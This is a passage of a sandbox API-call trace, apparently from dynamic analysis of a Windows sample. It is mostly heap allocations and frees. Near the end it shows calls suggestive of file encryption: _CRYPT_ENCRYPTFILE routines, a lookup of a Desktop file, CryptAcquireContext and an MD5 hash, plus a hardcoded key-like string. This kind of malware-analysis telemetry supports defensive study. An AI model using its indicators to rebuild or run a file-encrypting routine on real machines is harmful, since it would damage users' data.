lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0123.547] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.547] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0123.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0123.548] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392500 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0123.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359860 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0123.549] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0123.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0123.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0123.550] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0123.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0123.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0123.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0123.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0123.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0123.550] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0123.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0123.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0123.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0123.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0123.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0123.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0123.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0123.550] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0123.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0123.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9ce0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0123.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0123.550] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0123.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0123.550] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0123.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0123.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0123.551] CloseHandle (hObject=0x258) returned 1 [0123.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0123.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0123.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0123.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0123.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0123.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0123.551] FreeLibrary (hLibModule=0x772d0000) returned 1 [0123.551] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0123.551] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0123.551] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\jHCQtc-oyo Hp07enJ.ots", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6ceb560, ftCreationTime.dwHighDateTime=0x1d5e714, ftLastAccessTime.dwLowDateTime=0x1063a710, ftLastAccessTime.dwHighDateTime=0x1d5e941, ftLastWriteTime.dwLowDateTime=0x1063a710, ftLastWriteTime.dwHighDateTime=0x1d5e941, nFileSizeHigh=0x0, nFileSizeLow=0xd6ba, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="jHCQtc-oyo Hp07enJ.ots", cAlternateFileName="JHCQTC~1.OTS")) returned 0x41ac500 [0123.551] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0123.551] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0123.551] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.552] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0123.552] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.552] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0123.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0123.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0123.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797048, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0123.552] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0123.555] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0123.555] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0123.555] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0123.555] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0123.555] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0123.555] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0123.555] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0123.555] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0123.555] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0123.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0123.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caa18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0123.555] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0123.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0123.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0123.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0123.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0123.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0123.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0123.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0123.555] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e97a0 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0123.556] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0123.557] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2b18 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2b48 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0123.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2788 [0123.557] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0123.557] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392308 [0123.558] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0123.558] 